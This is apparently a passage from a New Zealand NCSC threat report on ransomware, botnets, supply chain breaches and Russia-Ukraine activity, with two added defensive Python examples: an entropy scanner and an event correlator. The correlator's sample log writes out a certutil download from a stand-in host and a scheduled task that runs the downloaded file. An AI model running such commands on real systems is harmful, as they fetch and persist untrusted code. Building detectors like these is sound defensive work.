Cyber crime and disruption
The numerous disruptive, financially motivated cyber incidents the NCSC recorded this year reflect the international landscape. Significant suppliers were compromised and held to ransom, with the manufacturing and healthcare sectors among the most impacted globally this year. Cyber criminals target these sectors owing to their sensitivity to downtime and disruption, and their reliance on older technology.
In past years, the NCSC observed extensive targeting of software vulnerabilities, predominantly from sophisticated cyber actors. Cyber criminals are now capable of this speed and scale of exploitation, previously the purview of likely state-backed actors. This was evident in June 2023 with the re-emergence of ‘Clop’ ransomware targeting users of Progress Software’s MOVEit Transfer, a web-based file-transfer application. Clop accessed over 100 instances of MOVEit using a zero-day vulnerability in the software, targeting organisations in the government, manufacturing, media, transport, retail, and professional services sectors. Clop, first observed in 2019, was among the pioneers of the ‘double extortion’ tactic – exfiltrating sensitive data before encrypting the victim’s copy of the files. Increasingly, cyber criminals forgo the encryption step, preferring to rely on data exfiltration as leverage over victims.
While power and popularity have coalesced in the hands of a few dominant ransomware-as-a-service providers over the 2022/2023 year, this has not entirely expunged opportunity for novel variants and new players. Just as we have observed enhanced speed and innovation in the ‘initial access’ phase, encryption has evolved and become increasingly automated. Cyber criminals have also optimised for the ransom of suppliers, for instance by developing malware to achieve high-impact compromises of hypervisors, the enabling software commonly used by infrastructure-as-a-service providers. Disabling a hypervisor could have far-reaching impacts for the multiple organisations that have a presence on the same physical hardware.
Timeline: A selection of high-impact ransomware events and disruption efforts.

Cyber criminals will continue to innovate, whether it is in the area of encryption, deployment, defence evasion, or extortion tactics. In some instances, the perception of encryption is enough to deceive unwitting individuals and organisations, and in others, partial encryption of just a portion of a file has been an effective way to disrupt business processes at pace.
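The partial-encryption tactic described above is a detection problem as much as a recovery one: a file that is only intermittently encrypted can still look like an ordinary document to a check that measures entropy over the whole file. The following is an added example, not code from the NCSC report, showing why a block-wise Shannon entropy scan catches what a whole-file check misses. The sample document is constructed, the "encrypted" regions are simulated with seeded pseudo-random bytes standing in for ciphertext, and the 1024-byte block size and 7.0 bits/byte threshold are assumptions.

```python
"""Block-wise Shannon entropy to spot partially (intermittently) encrypted files.

Added example, not from the NCSC report. The sample document and the
'encrypted' regions are constructed: seeded pseudo-random bytes stand in
for ciphertext, since real ciphertext is statistically indistinguishable
from random data for this purpose.
"""
import math
import random
from collections import Counter

BLOCK_SIZE = 1024          # bytes per block examined (assumption)
HIGH_ENTROPY = 7.0         # bits/byte; ciphertext and compressed data sit near 8


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def whole_file_verdict(data: bytes) -> bool:
    """Naive check: flags only when the file as a whole looks like ciphertext.
    A file that is mostly plaintext with a few encrypted blocks stays below
    the threshold, so this check misses intermittent encryption."""
    return shannon_entropy(data) >= HIGH_ENTROPY


def blockwise_scan(data: bytes, block_size: int = BLOCK_SIZE) -> list:
    """Return (offset, entropy) for each block whose entropy meets the threshold.
    Scanning per block localises the high-entropy regions inside an otherwise
    low-entropy file."""
    hits = []
    for offset in range(0, len(data), block_size):
        block = data[offset:offset + block_size]
        if len(block) < block_size // 2:   # ignore a short trailing fragment
            continue
        h = shannon_entropy(block)
        if h >= HIGH_ENTROPY:
            hits.append((offset, round(h, 2)))
    return hits


def build_sample(total_blocks: int = 16, encrypted_every: int = 4, seed: int = 7) -> bytes:
    """Constructed sample: repetitive plaintext with every Nth block replaced by
    pseudo-random bytes, mimicking a ransomware strain that encrypts only a
    fraction of each file to finish quickly."""
    rng = random.Random(seed)
    text = b"Quarterly invoice ledger - customer reference and amounts due. "
    plain = (text * (BLOCK_SIZE // len(text) + 1))[:BLOCK_SIZE]
    blocks = []
    for i in range(total_blocks):
        if i % encrypted_every == 0:
            blocks.append(bytes(rng.getrandbits(8) for _ in range(BLOCK_SIZE)))
        else:
            blocks.append(plain)
    return b"".join(blocks)


if __name__ == "__main__":
    sample = build_sample()
    print("whole-file check flagged:", whole_file_verdict(sample))
    for off, h in blockwise_scan(sample):
        print(f"high-entropy block at offset {off}: {h} bits/byte")
```

On the constructed sample the whole-file check returns False while the block-wise scan reports the four simulated ciphertext blocks, which is the gap an endpoint or backup-integrity monitor needs to close against partial encryption.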
In our region, the NCSC observed significant disruptive malicious cyber activity affecting our Southwest Pacific neighbours. Vanuatu and Tonga had their resilience tested by significant cyber incidents against government and telecommunications systems this year. To aid their recovery, CERT NZ provided advice and support to Pacific victims of profit-motivated disruption.
Investing in and reinforcing resilient practices, along with detecting and responding to incidents in a timely way, are core to deterring cyber criminal activity. However, disruptions to criminal infrastructure and operations are an increasingly common form of deterrence. Collaboration between law enforcement organisations led to seizures of criminal infrastructure in the fiscal year. For instance, the US Federal Bureau of Investigation (FBI) seized infrastructure belonging to Hive ransomware operators in January 2023, announcing it had infiltrated Hive’s network since July 2022. In doing so, the FBI was able to provide over 300 decryption keys, negating US$130 million of ransom demands. In an effort to discourage payments to organised criminals that perpetuate the cyber criminal ecosystem, many like-minded countries are putting in place clear disincentives for paying ransoms, and insurers are increasingly excluding cyber ransom payments from their policies. Also in the 2022/2023 year, Microsoft and Fortra (makers of Cobalt Strike, a popular penetration-testing suite) took legal action to identify and disable pirated and legacy instances of Cobalt Strike. Malicious cyber actors commonly abuse Cobalt Strike’s capabilities to enable their malicious computer network operations. These kinds of actions have likely set a precedent as a novel way to deter cyber criminal activity.
Obfuscation complicating detection
In 2022/2023, cyber security industry reporting identified a number of sophisticated botnets with the primary purpose of obfuscating the true origins of malicious cyber activity. During investigations into PRC malicious cyber activity, partners identified the use of compromised small office/home office (SOHO) devices in the geographic area of the victim.
Over the 2022/2023 year, malicious cyber actors have exploited weaknesses in a number of aging or end-of-life SOHO devices, notably routers and internet modems. SOHO devices are likely preferred for these more sophisticated botnets, owing to their capacity to handle high volumes of network traffic without causing service degradation, thereby avoiding alerting their legitimate users to the compromise.
Botnets almost certainly provide malicious cyber actors with cost-savings. For many sophisticated cyber actors, the exploitation of even thousands of vulnerable devices almost certainly falls short of the cost associated with maintaining operational infrastructure via legitimate providers. Additionally, legitimate providers are more likely to have monitoring and complaints processes that could disrupt malicious cyber activity on their platforms.
Industry analysis suggests compromise of internet-connected devices, such as routers or internet-of-things (IoT) devices, could also enable further compromises of inner network devices – previously assumed to be secured behind a gateway. These internationally identified trends in tactics and techniques for infrastructure procurement correlate with the NCSC’s own observations about the compromise of devices for use in botnets over at least the last two fiscal years.
Artificial intelligence has also begun to uplift malicious cyber actors’ defence evasion. Large language models and generative AI may be misused to add an air of legitimacy to a phishing campaign – thwarting human defences. Meanwhile, AI can quickly synthesise derivative malware that could evade technical detection capabilities. In 2022/2023, the NCSC observed rapid advances in AI and early signs of it being used in malicious cyber activity overseas. Big data could also enable the reconnaissance function of a malicious cyber campaign, including surmising connections between disparate pieces of personal or network information, or painting a picture of a victim’s preferences, to inform the malicious cyber actor’s approach.
It is also likely that AI enables greater cyber defences. AI-derived heuristics may be better than humans at identifying ‘living off the land’ and other hard-to-track techniques, where a number of innocuous actions need to be assessed together in context to identify activity that is malicious.
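The point above, that ‘living off the land’ activity only becomes visible when several individually innocuous actions are assessed together, can be shown without any AI at all: a plain correlation rule already captures the idea that no single event is the signal. The following is an added example, not code from the NCSC report. The process-event log lines are constructed, the pipe-delimited field layout is an assumption, and the three stage definitions (a document application spawning a scripting host, a built-in utility fetching content over HTTP, and creation of a scheduled task or Run key) and the 15-minute window are illustrative choices a detection engineer would tune to their own environment.

```python
"""Context-aware correlation of individually benign process events.

Added example, not from the NCSC report. Log lines, field layout, stage
definitions and the time window are constructed assumptions. Each stage on
its own is routine administration; only co-occurrence on one host inside
the window raises an alert.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Optional

WINDOW = timedelta(minutes=15)   # assumption: how close stages must sit in time
ALERT_STAGES = 2                 # distinct stages required before alerting

# Process names used by the stage definitions (illustrative, not exhaustive).
OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe"}
NETWORK_BUILTINS = {"certutil.exe", "bitsadmin.exe"}
PERSISTENCE_TOOLS = {"schtasks.exe", "reg.exe"}


@dataclass
class Event:
    ts: datetime
    host: str
    parent: str
    process: str
    cmdline: str


def parse_line(line: str) -> Event:
    """Parse 'ISO-timestamp|host|parent|process|cmdline' (constructed layout)."""
    ts, host, parent, process, cmdline = line.split("|", 4)
    return Event(datetime.fromisoformat(ts), host, parent.lower(), process.lower(), cmdline)


def classify(ev: Event) -> Optional[str]:
    """Map an event to a stage name, or None when it matches no stage.
    None is the common case: most events are noise and never accumulate."""
    cmd = ev.cmdline.lower()
    if ev.parent in OFFICE_APPS and ev.process in SCRIPT_HOSTS:
        return "doc_spawns_script"
    if ev.process in NETWORK_BUILTINS and "http" in cmd:
        return "builtin_download"
    if ev.process in PERSISTENCE_TOOLS and ("/create" in cmd or "\\run" in cmd):
        return "persistence"
    return None


def correlate(lines: list) -> dict:
    """Return {host: sorted stage names} for hosts where at least ALERT_STAGES
    distinct stages occur within WINDOW of each other. A single stage, or two
    stages far apart in time, never alerts."""
    events = sorted((parse_line(line) for line in lines), key=lambda e: e.ts)
    tagged_by_host = defaultdict(list)
    for ev in events:
        stage = classify(ev)
        if stage:
            tagged_by_host[ev.host].append((ev.ts, stage))
    alerts = {}
    for host, tagged in tagged_by_host.items():
        for i, (start, _) in enumerate(tagged):
            # Stages are counted once each; a repeated stage adds no weight.
            stages = {stage for ts, stage in tagged[i:] if ts - start <= WINDOW}
            if len(stages) >= ALERT_STAGES:
                alerts[host] = sorted(stages)
                break
    return alerts


# Constructed sample log. ws-17 shows all three stages inside six minutes;
# ws-22 is an administrator creating a backup task (one stage only); ws-09
# has two stages three hours apart, outside the window.
SAMPLE_LOG = [
    "2023-05-02T09:14:03|ws-17|WINWORD.EXE|powershell.exe|powershell.exe -File invoice_macro.ps1",
    "2023-05-02T09:15:40|ws-17|powershell.exe|certutil.exe|certutil.exe -urlcache -f http://files.example.invalid/update.bin update.bin",
    "2023-05-02T09:20:11|ws-17|powershell.exe|schtasks.exe|schtasks.exe /create /tn Updater /tr update.bin /sc onlogon",
    "2023-05-02T09:30:00|ws-22|explorer.exe|cmd.exe|cmd.exe /c dir",
    "2023-05-02T10:02:00|ws-22|cmd.exe|schtasks.exe|schtasks.exe /create /tn NightlyBackup /tr backup.cmd /sc daily",
    "2023-05-02T08:00:00|ws-09|EXCEL.EXE|cmd.exe|cmd.exe /c echo report",
    "2023-05-02T11:00:00|ws-09|cmd.exe|schtasks.exe|schtasks.exe /create /tn Cleanup /tr cleanup.cmd /sc weekly",
]

if __name__ == "__main__":
    for host, stages in correlate(SAMPLE_LOG).items():
        print(f"ALERT {host}: {', '.join(stages)}")
```

The same events seen one at a time would each be dismissed as routine; the stage set per host and time window is the context the paragraph refers to, and a learned model replaces the hand-written stage list and window rather than the correlation principle.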
Targeting the security supply chain
A feature of the international landscape in 2022/2023 was incidents affecting the security supply chain – software or services relied on to enable information security.
In August 2022, the popular password manager LastPass announced that its proprietary technical information and source code had been breached as part of a cyber incident. Security services represent a valuable target for both espionage and financially motivated actors. It is possible the malicious cyber actors sought an understanding of LastPass’ systems and controls in order to stage a more audacious compromise of users’ password vaults. These passwords may enable downstream access into networks of high intelligence or extortion value.
In the same month Twilio – a short message service (SMS) provider – reported a compromise during which a small but significant subset of customers was targeted. Accounts targeted belonged to the makers of the secure messaging application Signal, and the two-factor authentication application Authy. This deliberate targeting of specific Twilio customers suggested intent by malicious cyber actors to insert themselves into significant organisations’ security supply chains.
A coalescence of security services into the hands of a few cloud-based suppliers has provided security gains and, equally, incentive and opportunities for cyber threat actors. It is likely these high-profile examples have both prompted a security culture change and uplift at similar organisations and provided examples and proofs-of-concept to other capable malicious cyber actors.
Information operations
Information operations rely on technology and techniques similar to those used by malicious cyber actors conducting computer network exploitation. While the NCSC does not focus on tracking and responding to information operations, this overlap can make assessing the cyber threat environment more fraught.
Increasingly, technology enables a wider array of information operations. Just as commercial spyware has enabled more states – and even private organisations – to conduct commercial or political espionage, so too have private contractors systematised the spread of information to achieve strategic objectives. In some cases, information operations may be combined with computer network exploitation to meet requirements. For instance, contractors working for political candidates or incumbents to destabilise their opposition may compromise the email or social media accounts of their opponents, as well as manipulate discourse through inauthentic behaviour on public social media platforms. Information collected as part of a malicious cyber campaign might also shape the information environment. Hack-and-leak activity targeting prominent individuals or groups would be a form of malinformation – a truth used to inflict harm on a person, organisation, or state. The NCSC has a mandate to disrupt and support the victims of malicious cyber activity affecting the confidentiality, integrity or availability of Aotearoa New Zealand’s nationally significant computer networks. As such, the NCSC has a limited role when it comes to information operations, but we are responsive to reporting from our security partners and the public regarding possible information operations.
Russia-Ukraine
Shifts in the cyber threat landscape following Russia’s invasion of Ukraine in February 2022 continue to be felt internationally. Russia-aligned cyber actors are likely emboldened by the invasion, and we continue to see concerning activity affecting Russia’s neighbours and our like-minded partners. As the invasion persisted into 2023, malicious cyber activity continued to be observed in support of Russia and Ukraine, albeit not to the extent many suspected. The support Ukraine received to improve its cyber defences may have hampered the effectiveness of Russia’s actions in cyberspace.
Whatever the case, Russian malicious cyber activity has likely continued its pre-invasion trajectory, including targeting individuals of high espionage value with sophisticated social engineering and malware. This traditional cyber espionage has been punctuated by disruptive cyber campaigns directed at Ukraine and Russia’s other neighbours.
A theme of the year’s cyber landscape has been the rise of issue-motivated malicious cyber actors on both sides of the conflict. On the Russian side, these actors are likely emboldened by permissive attitudes to cyber-enabled crime within Russian borders. Issue-motivated cyber activity has usually followed the public commitment of support to Ukraine from Western democracies. Issue-motivated malicious cyber actors have widely targeted Western organisations with denial-of-service campaigns, including in the healthcare sector, with mixed success. The NCSC remains concerned about accidental escalation as a result of disruptive malicious cyber activity stemming from the Russia-Ukraine conflict.
The main cyber threat to Aotearoa New Zealand due to Russia’s invasion of Ukraine is indirect cyber targeting, affecting our critical supply chains. State-sponsored and non-state cyber actors alike could disrupt key suppliers on which Aotearoa New Zealand organisations depend.